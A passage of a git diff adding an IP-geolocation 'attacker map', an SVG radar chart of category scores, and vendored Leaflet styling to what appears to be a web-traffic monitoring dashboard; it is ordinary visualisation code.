// Additional cities + 'Unknown': null +}; + +// Country center coordinates (fallback when city not found) +const countryCoordinates = { + 'US': [37.1, -95.7], 'GB': [55.4, -3.4], 'CN': [35.9, 104.1], 'RU': [61.5, 105.3], + 'JP': [36.2, 138.3], 'DE': [51.2, 10.5], 'FR': [46.6, 2.2], 'IN': [20.6, 78.96], + 'BR': [-14.2, -51.9], 'CA': [56.1, -106.3], 'AU': [-25.3, 133.8], 'MX': [23.6, -102.6], + 'ZA': [-30.6, 22.9], 'KR': [35.9, 127.8], 'IT': [41.9, 12.6], 'ES': [40.5, -3.7], + 'NL': [52.1, 5.3], 'SE': [60.1, 18.6], 'CH': [46.8, 8.2], 'PL': [51.9, 19.1], + 'SG': [1.4, 103.8], 'HK': [22.4, 114.1], 'TW': [23.7, 120.96], 'TH': [15.9, 100.9], + 'VN': [14.1, 108.8], 'ID': [-0.8, 113.2], 'PH': [12.9, 121.8], 'MY': [4.2, 101.7], + 'PK': [30.4, 69.2], 'BD': [23.7, 90.4], 'NG': [9.1, 8.7], 'EG': [26.8, 30.8], + 'TR': [38.9, 35.2], 'IR': [32.4, 53.7], 'AE': [23.4, 53.8], 'KZ': [48.0, 66.9], + 'UA': [48.4, 31.2], 'BG': [42.7, 25.5], 'RO': [45.9, 24.97], 'CZ': [49.8, 15.5], + 'HU': [47.2, 19.5], 'AT': [47.5, 14.6], 'BE': [50.5, 4.5], 'DK': [56.3, 9.5], + 'FI': [61.9, 25.8], 'NO': [60.5, 8.5], 'GR': [39.1, 21.8], 'PT': [39.4, -8.2], + 'AR': [-38.4161, -63.6167], 'CO': [4.5709, -74.2973], 'CL': [-35.6751, -71.5430], + 'PE': [-9.1900, -75.0152], 'VE': [6.4238, -66.5897], 'LS': [40.0, -100.0] +}; + +// Helper function to get coordinates for an IP +function getIPCoordinates(ip) { + if (ip.latitude != null && ip.longitude != null) { + return [ip.latitude, ip.longitude]; + } + if (ip.city && cityCoordinates[ip.city]) { + return cityCoordinates[ip.city]; + } + if (ip.country_code && countryCoordinates[ip.country_code]) { + return countryCoordinates[ip.country_code]; + } + return null; +} + +// Fetch IPs from the API, handling pagination for "all" +async function fetchIpsForMap(limit) { + const DASHBOARD_PATH = window.__DASHBOARD_PATH__ || ''; + const headers = { 'Cache-Control': 'no-cache', 'Pragma': 'no-cache' }; + + if (limit === 'all') { + // Fetch in pages of 1000 until we have everything + let collected = []; + let page = 1; + const pageSize = 1000; + while (true) { + const response = await fetch( + `${DASHBOARD_PATH}/api/all-ips?page=${page}&page_size=${pageSize}&sort_by=total_requests&sort_order=desc`, + { cache: 'no-store', headers } + ); + if (!response.ok) throw new Error('Failed to fetch IPs'); + const data = await response.json(); + collected = collected.concat(data.ips || []); + if (page >= data.pagination.total_pages) break; + page++; + } + return collected; + } + + const pageSize = parseInt(limit, 10); + const response = await fetch( + `${DASHBOARD_PATH}/api/all-ips?page=1&page_size=${pageSize}&sort_by=total_requests&sort_order=desc`, + { cache: 'no-store', headers } + ); + if (!response.ok) throw new Error('Failed to fetch IPs'); + const data = await response.json(); + return data.ips || []; +} + +// Build markers from an IP list and add them to the map +function buildMapMarkers(ips) { + // Clear existing cluster group + if (clusterGroup) { + attackerMap.removeLayer(clusterGroup); + clusterGroup.clearLayers(); + } + mapMarkers = []; + + // Single cluster group with custom pie-chart icons + clusterGroup = L.markerClusterGroup({ + maxClusterRadius: 35, + spiderfyOnMaxZoom: true, + showCoverageOnHover: false, + zoomToBoundsOnClick: true, + disableClusteringAtZoom: 8, + iconCreateFunction: createClusterIcon + }); + + // Track used coordinates to add small offsets for overlapping markers + const usedCoordinates = {}; + function getUniqueCoordinates(baseCoords) { + const key = `${baseCoords[0].toFixed(4)},${baseCoords[1].toFixed(4)}`; + if (!usedCoordinates[key]) { + usedCoordinates[key] = 0; + } + usedCoordinates[key]++; + + if (usedCoordinates[key] === 1) { + return baseCoords; + } + + const angle = (usedCoordinates[key] * 137.5) % 360; + const distance = 0.05 * Math.sqrt(usedCoordinates[key]); + const latOffset = distance * Math.cos(angle * Math.PI / 180); + const lngOffset = distance * Math.sin(angle * Math.PI / 180); + + return [ + baseCoords[0] + latOffset, + baseCoords[1] + lngOffset + ]; + } + + const DASHBOARD_PATH = window.__DASHBOARD_PATH__ || ''; + + ips.forEach(ip => { + if (!ip.country_code || !ip.category) return; + + const baseCoords = getIPCoordinates(ip); + if (!baseCoords) return; + + const coords = getUniqueCoordinates(baseCoords); + const category = ip.category.toLowerCase(); + if (!categoryColors[category]) return; + + const requestsForScale = Math.min(ip.total_requests, 10000); + const sizeRatio = Math.pow(requestsForScale / 10000, 0.5); + const markerSize = Math.max(10, Math.min(30, 10 + (sizeRatio * 20))); + + const markerElement = document.createElement('div'); + markerElement.className = `ip-marker marker-${category}`; + markerElement.style.width = markerSize + 'px'; + markerElement.style.height = markerSize + 'px'; + markerElement.style.fontSize = (markerSize * 0.5) + 'px'; + markerElement.textContent = '\u25CF'; + + const marker = L.marker(coords, { + icon: L.divIcon({ + html: markerElement.outerHTML, + iconSize: [markerSize, markerSize], + className: `ip-custom-marker category-${category}` + }), + category: category + }); + + const categoryColor = categoryColors[category] || '#8b949e'; + const categoryLabels = { + attacker: 'Attacker', + bad_crawler: 'Bad Crawler', + good_crawler: 'Good Crawler', + regular_user: 'Regular User', + unknown: 'Unknown' + }; + + marker.bindPopup('', { + maxWidth: 550, + className: 'ip-detail-popup' + }); + + marker.on('click', async function(e) { + const loadingPopup = ` +
+
+ ${ip.ip} + + ${categoryLabels[category]} + +
+
+
Loading details...
+
+
+ `; + + marker.setPopupContent(loadingPopup); + marker.openPopup(); + + try { + const response = await fetch(`${DASHBOARD_PATH}/api/ip-stats/${ip.ip}`); + if (!response.ok) throw new Error('Failed to fetch IP stats'); + + const stats = await response.json(); + + let popupContent = ` +
+
+ ${ip.ip} + +
+
+ + ${categoryLabels[category]} + +
+ + ${ip.city ? (ip.country_code ? `${ip.city}, ${ip.country_code}` : ip.city) : (ip.country_code || 'Unknown')} +
+
+
Requests: ${ip.total_requests}
+
First Seen: ${formatTimestamp(ip.first_seen)}
+
Last Seen: ${formatTimestamp(ip.last_seen)}
+
+ `; + + if (stats.category_scores && Object.keys(stats.category_scores).length > 0) { + const chartHtml = generateMapPanelRadarChart(stats.category_scores); + popupContent += ` +
+ ${chartHtml} +
+ `; + } + + popupContent += '
'; + marker.setPopupContent(popupContent); + } catch (err) { + console.error('Error fetching IP stats:', err); + const errorPopup = ` +
+
+ ${ip.ip} + +
+
+ + ${categoryLabels[category]} + +
+ + ${ip.city ? (ip.country_code ? `${ip.city}, ${ip.country_code}` : ip.city) : (ip.country_code || 'Unknown')} +
+
+
Requests: ${ip.total_requests}
+
First Seen: ${formatTimestamp(ip.first_seen)}
+
Last Seen: ${formatTimestamp(ip.last_seen)}
+
+
+ Failed to load chart: ${err.message} +
+
+ `; + marker.setPopupContent(errorPopup); + } + }); + + mapMarkers.push(marker); + // Only add to cluster if category is not hidden + if (!hiddenCategories.has(category)) { + clusterGroup.addLayer(marker); + } + }); + + attackerMap.addLayer(clusterGroup); + + // Fit map to visible markers + const visibleMarkers = mapMarkers.filter(m => !hiddenCategories.has(m.options.category)); + if (visibleMarkers.length > 0) { + const bounds = L.featureGroup(visibleMarkers).getBounds(); + attackerMap.fitBounds(bounds, { padding: [50, 50] }); + } +} + +async function initializeAttackerMap() { + const mapContainer = document.getElementById('attacker-map'); + if (!mapContainer || attackerMap) return; + + try { + attackerMap = L.map('attacker-map', { + center: [20, 0], + zoom: 2, + layers: [ + L.tileLayer('https://{s}.basemaps.cartocdn.com/dark_all/{z}/{x}/{y}{r}.png', { + attribution: '© CartoDB | © OpenStreetMap contributors', + maxZoom: 19, + subdomains: 'abcd' + }) + ] + }); + + // Get the selected limit from the dropdown (default 100) + const limitSelect = document.getElementById('map-ip-limit'); + const limit = limitSelect ? limitSelect.value : '100'; + + allIps = await fetchIpsForMap(limit); + + if (allIps.length === 0) { + mapContainer.innerHTML = '
No IP location data available
'; + return; + } + + buildMapMarkers(allIps); + + // Force Leaflet to recalculate container size after the tab becomes visible. + setTimeout(() => { + if (attackerMap) attackerMap.invalidateSize(); + }, 300); + + } catch (err) { + console.error('Error initializing attacker map:', err); + mapContainer.innerHTML = '
Failed to load map: ' + err.message + '
'; + } +} + +// Reload map markers when the user changes the IP limit selector +async function reloadMapWithLimit(limit) { + if (!attackerMap) return; + + // Show loading state + const mapContainer = document.getElementById('attacker-map'); + const overlay = document.createElement('div'); + overlay.id = 'map-loading-overlay'; + overlay.style.cssText = 'position:absolute;top:0;left:0;right:0;bottom:0;background:rgba(13,17,23,0.7);display:flex;align-items:center;justify-content:center;z-index:1000;color:#8b949e;font-size:14px;'; + overlay.textContent = 'Loading IPs...'; + mapContainer.style.position = 'relative'; + mapContainer.appendChild(overlay); + + try { + allIps = await fetchIpsForMap(limit); + buildMapMarkers(allIps); + } catch (err) { + console.error('Error reloading map:', err); + } finally { + const existing = document.getElementById('map-loading-overlay'); + if (existing) existing.remove(); + } +} + +// Update map filters based on checkbox selection +function updateMapFilters() { + if (!attackerMap || !clusterGroup) return; + + hiddenCategories.clear(); + document.querySelectorAll('.map-filter').forEach(cb => { + const category = cb.getAttribute('data-category'); + if (category && !cb.checked) hiddenCategories.add(category); + }); + + // Rebuild cluster group with only visible markers + clusterGroup.clearLayers(); + const visible = mapMarkers.filter(m => !hiddenCategories.has(m.options.category)); + clusterGroup.addLayers(visible); +} + +// Generate radar chart SVG for map panel popups +function generateMapPanelRadarChart(categoryScores) { + if (!categoryScores || Object.keys(categoryScores).length === 0) { + return '
No category data available
'; + } + + let html = '
'; + html += ''; + + const scores = { + attacker: categoryScores.attacker || 0, + good_crawler: categoryScores.good_crawler || 0, + bad_crawler: categoryScores.bad_crawler || 0, + regular_user: categoryScores.regular_user || 0, + unknown: categoryScores.unknown || 0 + }; + + const maxScore = Math.max(...Object.values(scores), 1); + const minVisibleRadius = 0.15; + const normalizedScores = {}; + + Object.keys(scores).forEach(key => { + normalizedScores[key] = minVisibleRadius + (scores[key] / maxScore) * (1 - minVisibleRadius); + }); + + const colors = { + attacker: '#f85149', + good_crawler: '#3fb950', + bad_crawler: '#f0883e', + regular_user: '#58a6ff', + unknown: '#8b949e' + }; + + const labels = { + attacker: 'Attacker', + good_crawler: 'Good Bot', + bad_crawler: 'Bad Bot', + regular_user: 'User', + unknown: 'Unknown' + }; + + const cx = 100, cy = 100, maxRadius = 75; + for (let i = 1; i <= 5; i++) { + const r = (maxRadius / 5) * i; + html += ``; + } + + const angles = [0, 72, 144, 216, 288]; + const keys = ['good_crawler', 'regular_user', 'unknown', 'bad_crawler', 'attacker']; + + angles.forEach((angle, i) => { + const rad = (angle - 90) * Math.PI / 180; + const x2 = cx + maxRadius * Math.cos(rad); + const y2 = cy + maxRadius * Math.sin(rad); + html += ``; + + const labelDist = maxRadius + 35; + const lx = cx + labelDist * Math.cos(rad); + const ly = cy + labelDist * Math.sin(rad); + html += `${labels[keys[i]]}`; + }); + + let points = []; + angles.forEach((angle, i) => { + const normalizedScore = normalizedScores[keys[i]]; + const rad = (angle - 90) * Math.PI / 180; + const r = normalizedScore * maxRadius; + const x = cx + r * Math.cos(rad); + const y = cy + r * Math.sin(rad); + points.push(`${x},${y}`); + }); + + const dominantKey = Object.keys(scores).reduce((a, b) => scores[a] > scores[b] ? a : b); + const dominantColor = colors[dominantKey]; + + html += ``; + + angles.forEach((angle, i) => { + const normalizedScore = normalizedScores[keys[i]]; + const rad = (angle - 90) * Math.PI / 180; + const r = normalizedScore * maxRadius; + const x = cx + r * Math.cos(rad); + const y = cy + r * Math.sin(rad); + html += ``; + }); + + html += ''; + html += '
'; + return html; +} diff --git a/src/templates/static/js/radar.js b/src/templates/static/js/radar.js new file mode 100644 index 0000000..fbe4974 --- /dev/null +++ b/src/templates/static/js/radar.js @@ -0,0 +1,130 @@ +// Radar chart generation for IP stats +// Used by map popups and IP detail partials +// Extracted from dashboard_template.py (lines ~2092-2181) + +/** + * Generate an SVG radar chart for category scores. + * This is a reusable function that can be called from: + * - Map popup panels (generateMapPanelRadarChart in map.js) + * - IP detail partials (server-side or client-side rendering) + * + * @param {Object} categoryScores - Object with keys: attacker, good_crawler, bad_crawler, regular_user, unknown + * @param {number} [size=200] - Width/height of the SVG in pixels + * @param {boolean} [showLegend=true] - Whether to show the legend below the chart + * @param {string} [legendPosition='below'] - 'below' or 'side' (side = legend to the right of the chart) + * @returns {string} HTML string containing the SVG radar chart + */ +function generateRadarChart(categoryScores, size, showLegend, legendPosition) { + size = size || 200; + if (showLegend === undefined) showLegend = true; + legendPosition = legendPosition || 'below'; + + if (!categoryScores || Object.keys(categoryScores).length === 0) { + return '
No category data available
'; + } + + const scores = { + attacker: categoryScores.attacker || 0, + good_crawler: categoryScores.good_crawler || 0, + bad_crawler: categoryScores.bad_crawler || 0, + regular_user: categoryScores.regular_user || 0, + unknown: categoryScores.unknown || 0 + }; + + const maxScore = Math.max(...Object.values(scores), 1); + const minVisibleRadius = 0.15; + const normalizedScores = {}; + + Object.keys(scores).forEach(key => { + normalizedScores[key] = minVisibleRadius + (scores[key] / maxScore) * (1 - minVisibleRadius); + }); + + const colors = { + attacker: '#f85149', + good_crawler: '#3fb950', + bad_crawler: '#f0883e', + regular_user: '#58a6ff', + unknown: '#8b949e' + }; + + const labels = { + attacker: 'Attacker', + good_crawler: 'Good Bot', + bad_crawler: 'Bad Bot', + regular_user: 'User', + unknown: 'Unknown' + }; + + const cx = 100, cy = 100, maxRadius = 75; + + const flexDir = legendPosition === 'side' ? 'row' : 'column'; + let html = `
`; + html += ``; + + // Draw concentric circles (grid) + for (let i = 1; i <= 5; i++) { + const r = (maxRadius / 5) * i; + html += ``; + } + + const angles = [0, 72, 144, 216, 288]; + const keys = ['good_crawler', 'regular_user', 'unknown', 'bad_crawler', 'attacker']; + + // Draw axis lines and labels + angles.forEach((angle, i) => { + const rad = (angle - 90) * Math.PI / 180; + const x2 = cx + maxRadius * Math.cos(rad); + const y2 = cy + maxRadius * Math.sin(rad); + html += ``; + + const labelDist = maxRadius + 35; + const lx = cx + labelDist * Math.cos(rad); + const ly = cy + labelDist * Math.sin(rad); + html += `${labels[keys[i]]}`; + }); + + // Calculate polygon points + let points = []; + angles.forEach((angle, i) => { + const normalizedScore = normalizedScores[keys[i]]; + const rad = (angle - 90) * Math.PI / 180; + const r = normalizedScore * maxRadius; + const x = cx + r * Math.cos(rad); + const y = cy + r * Math.sin(rad); + points.push(`${x},${y}`); + }); + + // Determine dominant category for color + const dominantKey = Object.keys(scores).reduce((a, b) => scores[a] > scores[b] ? a : b); + const dominantColor = colors[dominantKey]; + + // Draw filled polygon + html += ``; + + // Draw data point dots + angles.forEach((angle, i) => { + const normalizedScore = normalizedScores[keys[i]]; + const rad = (angle - 90) * Math.PI / 180; + const r = normalizedScore * maxRadius; + const x = cx + r * Math.cos(rad); + const y = cy + r * Math.sin(rad); + html += ``; + }); + + html += ''; + + // Optional legend + if (showLegend) { + html += '
'; + keys.forEach(key => { + html += '
'; + html += `
`; + html += `${labels[key]}: ${scores[key]} pt`; + html += '
'; + }); + html += '
'; + } + + html += '
'; + return html; +} diff --git a/src/templates/static/vendor/css/MarkerCluster.Default.css b/src/templates/static/vendor/css/MarkerCluster.Default.css new file mode 100644 index 0000000..bbc8c9f --- /dev/null +++ b/src/templates/static/vendor/css/MarkerCluster.Default.css @@ -0,0 +1,60 @@ +.marker-cluster-small { + background-color: rgba(181, 226, 140, 0.6); + } +.marker-cluster-small div { + background-color: rgba(110, 204, 57, 0.6); + } + +.marker-cluster-medium { + background-color: rgba(241, 211, 87, 0.6); + } +.marker-cluster-medium div { + background-color: rgba(240, 194, 12, 0.6); + } + +.marker-cluster-large { + background-color: rgba(253, 156, 115, 0.6); + } +.marker-cluster-large div { + background-color: rgba(241, 128, 23, 0.6); + } + + /* IE 6-8 fallback colors */ +.leaflet-oldie .marker-cluster-small { + background-color: rgb(181, 226, 140); + } +.leaflet-oldie .marker-cluster-small div { + background-color: rgb(110, 204, 57); + } + +.leaflet-oldie .marker-cluster-medium { + background-color: rgb(241, 211, 87); + } +.leaflet-oldie .marker-cluster-medium div { + background-color: rgb(240, 194, 12); + } + +.leaflet-oldie .marker-cluster-large { + background-color: rgb(253, 156, 115); + } +.leaflet-oldie .marker-cluster-large div { + background-color: rgb(241, 128, 23); +} + +.marker-cluster { + background-clip: padding-box; + border-radius: 20px; + } +.marker-cluster div { + width: 30px; + height: 30px; + margin-left: 5px; + margin-top: 5px; + + text-align: center; + border-radius: 15px; + font: 12px "Helvetica Neue", Arial, Helvetica, sans-serif; + } +.marker-cluster span { + line-height: 30px; + } \ No newline at end of file diff --git a/src/templates/static/vendor/css/MarkerCluster.css b/src/templates/static/vendor/css/MarkerCluster.css new file mode 100644 index 0000000..c60d71b --- /dev/null +++ b/src/templates/static/vendor/css/MarkerCluster.css @@ -0,0 +1,14 @@ +.leaflet-cluster-anim .leaflet-marker-icon, .leaflet-cluster-anim .leaflet-marker-shadow { + -webkit-transition: -webkit-transform 0.3s ease-out, opacity 0.3s ease-in; + -moz-transition: -moz-transform 0.3s ease-out, opacity 0.3s ease-in; + -o-transition: -o-transform 0.3s ease-out, opacity 0.3s ease-in; + transition: transform 0.3s ease-out, opacity 0.3s ease-in; +} + +.leaflet-cluster-spider-leg { + /* stroke-dashoffset (duration and function) should match with leaflet-marker-icon transform in order to track it exactly */ + -webkit-transition: -webkit-stroke-dashoffset 0.3s ease-out, -webkit-stroke-opacity 0.3s ease-in; + -moz-transition: -moz-stroke-dashoffset 0.3s ease-out, -moz-stroke-opacity 0.3s ease-in; + -o-transition: -o-stroke-dashoffset 0.3s ease-out, -o-stroke-opacity 0.3s ease-in; + transition: stroke-dashoffset 0.3s ease-out, stroke-opacity 0.3s ease-in; +} diff --git a/src/templates/static/vendor/css/images/layers-2x.png b/src/templates/static/vendor/css/images/layers-2x.png new file mode 100644 index 0000000..200c333 Binary files /dev/null and b/src/templates/static/vendor/css/images/layers-2x.png differ diff --git a/src/templates/static/vendor/css/images/layers.png b/src/templates/static/vendor/css/images/layers.png new file mode 100644 index 0000000..1a72e57 Binary files /dev/null and b/src/templates/static/vendor/css/images/layers.png differ diff --git a/src/templates/static/vendor/css/images/marker-icon-2x.png b/src/templates/static/vendor/css/images/marker-icon-2x.png new file mode 100644 index 0000000..88f9e50 Binary files /dev/null and b/src/templates/static/vendor/css/images/marker-icon-2x.png differ diff --git a/src/templates/static/vendor/css/images/marker-icon.png b/src/templates/static/vendor/css/images/marker-icon.png new file mode 100644 index 0000000..950edf2 Binary files /dev/null and b/src/templates/static/vendor/css/images/marker-icon.png differ diff --git a/src/templates/static/vendor/css/images/marker-shadow.png b/src/templates/static/vendor/css/images/marker-shadow.png new file mode 100644 index 0000000..9fd2979 Binary files /dev/null and b/src/templates/static/vendor/css/images/marker-shadow.png differ diff --git a/src/templates/static/vendor/css/leaflet.min.css b/src/templates/static/vendor/css/leaflet.min.css new file mode 100644 index 0000000..d9ee57d --- /dev/null +++ b/src/templates/static/vendor/css/leaflet.min.css @@ -0,0 +1 @@ +.leaflet-image-layer,.leaflet-layer,.leaflet-marker-icon,.leaflet-marker-shadow,.leaflet-pane,.leaflet-pane>canvas,.leaflet-pane>svg,.leaflet-tile,.leaflet-tile-container,.leaflet-zoom-box{position:absolute;left:0;top:0}.leaflet-container{overflow:hidden}.leaflet-marker-icon,.leaflet-marker-shadow,.leaflet-tile{-webkit-user-select:none;-moz-user-select:none;user-select:none;-webkit-user-drag:none}.leaflet-tile::selection{background:0 0}.leaflet-safari .leaflet-tile{image-rendering:-webkit-optimize-contrast}.leaflet-safari .leaflet-tile-container{width:1600px;height:1600px;-webkit-transform-origin:0 0}.leaflet-marker-icon,.leaflet-marker-shadow{display:block}.leaflet-container .leaflet-overlay-pane svg{max-width:none!important;max-height:none!important}.leaflet-container .leaflet-marker-pane img,.leaflet-container .leaflet-shadow-pane img,.leaflet-container .leaflet-tile,.leaflet-container .leaflet-tile-pane img,.leaflet-container img.leaflet-image-layer{max-width:none!important;max-height:none!important;width:auto;padding:0}.leaflet-container img.leaflet-tile{mix-blend-mode:plus-lighter}.leaflet-container.leaflet-touch-zoom{-ms-touch-action:pan-x pan-y;touch-action:pan-x pan-y}.leaflet-container.leaflet-touch-drag{-ms-touch-action:pinch-zoom;touch-action:none;touch-action:pinch-zoom}.leaflet-container.leaflet-touch-drag.leaflet-touch-zoom{-ms-touch-action:none;touch-action:none}.leaflet-container{-webkit-tap-highlight-color:transparent}.leaflet-container a{-webkit-tap-highlight-color:rgba(51,181,229,.4)}.leaflet-tile{filter:inherit;visibility:hidden}.leaflet-tile-loaded{visibility:inherit}.leaflet-zoom-box{width:0;height:0;-moz-box-sizing:border-box;box-sizing:border-box;z-index:800}.leaflet-overlay-pane svg{-moz-user-select:none}.leaflet-pane{z-index:400}.leaflet-tile-pane{z-index:200}.leaflet-overlay-pane{z-index:400}.leaflet-shadow-pane{z-index:500}.leaflet-marker-pane{z-index:600}.leaflet-tooltip-pane{z-index:650}.leaflet-popup-pane{z-index:700}.leaflet-map-pane canvas{z-index:100}.leaflet-map-pane svg{z-index:200}.leaflet-vml-shape{width:1px;height:1px}.lvml{behavior:url(#default#VML);display:inline-block;position:absolute}.leaflet-control{position:relative;z-index:800;pointer-events:visiblePainted;pointer-events:auto}.leaflet-bottom,.leaflet-top{position:absolute;z-index:1000;pointer-events:none}.leaflet-top{top:0}.leaflet-right{right:0}.leaflet-bottom{bottom:0}.leaflet-left{left:0}.leaflet-control{float:left;clear:both}.leaflet-right .leaflet-control{float:right}.leaflet-top .leaflet-control{margin-top:10px}.leaflet-bottom .leaflet-control{margin-bottom:10px}.leaflet-left .leaflet-control{margin-left:10px}.leaflet-right .leaflet-control{margin-right:10px}.leaflet-fade-anim .leaflet-popup{opacity:0;-webkit-transition:opacity .2s linear;-moz-transition:opacity .2s linear;transition:opacity .2s linear}.leaflet-fade-anim .leaflet-map-pane .leaflet-popup{opacity:1}.leaflet-zoom-animated{-webkit-transform-origin:0 0;-ms-transform-origin:0 0;transform-origin:0 0}svg.leaflet-zoom-animated{will-change:transform}.leaflet-zoom-anim .leaflet-zoom-animated{-webkit-transition:-webkit-transform .25s cubic-bezier(0,0,.25,1);-moz-transition:-moz-transform .25s cubic-bezier(0,0,.25,1);transition:transform .25s cubic-bezier(0,0,.25,1)}.leaflet-pan-anim .leaflet-tile,.leaflet-zoom-anim .leaflet-tile{-webkit-transition:none;-moz-transition:none;transition:none}.leaflet-zoom-anim .leaflet-zoom-hide{visibility:hidden}.leaflet-interactive{cursor:pointer}.leaflet-grab{cursor:-webkit-grab;cursor:-moz-grab;cursor:grab}.leaflet-crosshair,.leaflet-crosshair .leaflet-interactive{cursor:crosshair}.leaflet-control,.leaflet-popup-pane{cursor:auto}.leaflet-dragging .leaflet-grab,.leaflet-dragging .leaflet-grab .leaflet-interactive,.leaflet-dragging .leaflet-marker-draggable{cursor:move;cursor:-webkit-grabbing;cursor:-moz-grabbing;cursor:grabbing}.leaflet-image-layer,.leaflet-marker-icon,.leaflet-marker-shadow,.leaflet-pane>svg path,.leaflet-tile-container{pointer-events:none}.leaflet-image-layer.leaflet-interactive,.leaflet-marker-icon.leaflet-interactive,.leaflet-pane>svg path.leaflet-interactive,svg.leaflet-image-layer.leaflet-interactive path{pointer-events:visiblePainted;pointer-events:auto}.leaflet-container{background:#ddd;outline-offset:1px}.leaflet-container a{color:#0078a8}.leaflet-zoom-box{border:2px dotted #38f;background:rgba(255,255,255,.5)}.leaflet-container{font-family:"Helvetica Neue",Arial,Helvetica,sans-serif;font-size:12px;font-size:.75rem;line-height:1.5}.leaflet-bar{box-shadow:0 1px 5px rgba(0,0,0,.65);border-radius:4px}.leaflet-bar a{background-color:#fff;border-bottom:1px solid #ccc;width:26px;height:26px;line-height:26px;display:block;text-align:center;text-decoration:none;color:#000}.leaflet-bar a,.leaflet-control-layers-toggle{background-position:50% 50%;background-repeat:no-repeat;display:block}.leaflet-bar a:focus,.leaflet-bar a:hover{background-color:#f4f4f4}.leaflet-bar a:first-child{border-top-left-radius:4px;border-top-right-radius:4px}.leaflet-bar a:last-child{border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-bottom:none}.leaflet-bar a.leaflet-disabled{cursor:default;background-color:#f4f4f4;color:#bbb}.leaflet-touch .leaflet-bar a{width:30px;height:30px;line-height:30px}.leaflet-touch .leaflet-bar a:first-child{border-top-left-radius:2px;border-top-right-radius:2px}.leaflet-touch .leaflet-bar a:last-child{border-bottom-left-radius:2px;border-bottom-right-radius:2px}.leaflet-control-zoom-in,.leaflet-control-zoom-out{font:bold 18px 'Lucida Console',Monaco,monospace;text-indent:1px}.leaflet-touch .leaflet-control-zoom-in,.leaflet-touch .leaflet-control-zoom-out{font-size:22px}.leaflet-control-layers{box-shadow:0 1px 5px rgba(0,0,0,.4);background:#fff;border-radius:5px}.leaflet-control-layers-toggle{background-image:url(images/layers.png);width:36px;height:36px}.leaflet-retina .leaflet-control-layers-toggle{background-image:url(images/layers-2x.png);background-size:26px 26px}.leaflet-touch .leaflet-control-layers-toggle{width:44px;height:44px}.leaflet-control-layers .leaflet-control-layers-list,.leaflet-control-layers-expanded .leaflet-control-layers-toggle{display:none}.leaflet-control-layers-expanded .leaflet-control-layers-list{display:block;position:relative}.leaflet-control-layers-expanded{padding:6px 10px 6px 6px;color:#333;background:#fff}.leaflet-control-layers-scrollbar{overflow-y:scroll;overflow-x:hidden;padding-right:5px}.leaflet-control-layers-selector{margin-top:2px;position:relative;top:1px}.leaflet-control-layers label{display:block;font-size:13px;font-size:1.08333em}.leaflet-control-layers-separator{height:0;border-top:1px solid #ddd;margin:5px -10px 5px -6px}.leaflet-default-icon-path{background-image:url(images/marker-icon.png)}.leaflet-container .leaflet-control-attribution{background:#fff;background:rgba(255,255,255,.8);margin:0}.leaflet-control-attribution,.leaflet-control-scale-line{padding:0 5px;color:#333;line-height:1.4}.leaflet-control-attribution a{text-decoration:none}.leaflet-control-attribution a:focus,.leaflet-control-attribution a:hover{text-decoration:underline}.leaflet-attribution-flag{display:inline!important;vertical-align:baseline!important;width:1em;height:.6669em}.leaflet-left .leaflet-control-scale{margin-left:5px}.leaflet-bottom .leaflet-control-scale{margin-bottom:5px}.leaflet-control-scale-line{border:2px solid #777;border-top:none;line-height:1.1;padding:2px 5px 1px;white-space:nowrap;-moz-box-sizing:border-box;box-sizing:border-box;background:rgba(255,255,255,.8);text-shadow:1px 1px #fff}.leaflet-control-scale-line:not(:first-child){border-top:2px solid #777;border-bottom:none;margin-top:-2px}.leaflet-control-scale-line:not(:first-child):not(:last-child){border-bottom:2px solid #777}.leaflet-touch .leaflet-bar,.leaflet-touch .leaflet-control-attribution,.leaflet-touch .leaflet-control-layers{box-shadow:none}.leaflet-touch .leaflet-bar,.leaflet-touch .leaflet-control-layers{border:2px solid rgba(0,0,0,.2);background-clip:padding-box}.leaflet-popup{position:absolute;text-align:center;margin-bottom:20px}.leaflet-popup-content-wrapper{padding:1px;text-align:left;border-radius:12px}.leaflet-popup-content{margin:13px 24px 13px 20px;line-height:1.3;font-size:13px;font-size:1.08333em;min-height:1px}.leaflet-popup-content p{margin:17px 0;margin:1.3em 0}.leaflet-popup-tip-container{width:40px;height:20px;position:absolute;left:50%;margin-top:-1px;margin-left:-20px;overflow:hidden;pointer-events:none}.leaflet-popup-tip{width:17px;height:17px;padding:1px;margin:-10px auto 0;pointer-events:auto;-webkit-transform:rotate(45deg);-moz-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg)}.leaflet-popup-content-wrapper,.leaflet-popup-tip{background:#fff;color:#333;box-shadow:0 3px 14px rgba(0,0,0,.4)}.leaflet-container a.leaflet-popup-close-button{position:absolute;top:0;right:0;border:none;text-align:center;width:24px;height:24px;font:16px/24px Tahoma,Verdana,sans-serif;color:#757575;text-decoration:none;background:0 0}.leaflet-container a.leaflet-popup-close-button:focus,.leaflet-container a.leaflet-popup-close-button:hover{color:#585858}.leaflet-popup-scrolled{overflow:auto}.leaflet-oldie .leaflet-popup-content-wrapper{-ms-zoom:1}.leaflet-oldie .leaflet-popup-tip{width:24px;margin:0 auto}.leaflet-oldie .leaflet-control-layers,.leaflet-oldie .leaflet-control-zoom,.leaflet-oldie .leaflet-popup-content-wrapper,.leaflet-oldie .leaflet-popup-tip{border:1px solid #999}.leaflet-div-icon{background:#fff;border:1px solid #666}.leaflet-tooltip{position:absolute;padding:6px;background-color:#fff;border:1px solid #fff;border-radius:3px;color:#222;white-space:nowrap;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;pointer-events:none;box-shadow:0 1px 3px rgba(0,0,0,.4)}.leaflet-tooltip.leaflet-interactive{cursor:pointer;pointer-events:auto}.leaflet-tooltip-bottom:before,.leaflet-tooltip-left:before,.leaflet-tooltip-right:before,.leaflet-tooltip-top:before{position:absolute;pointer-events:none;border:6px solid transparent;background:0 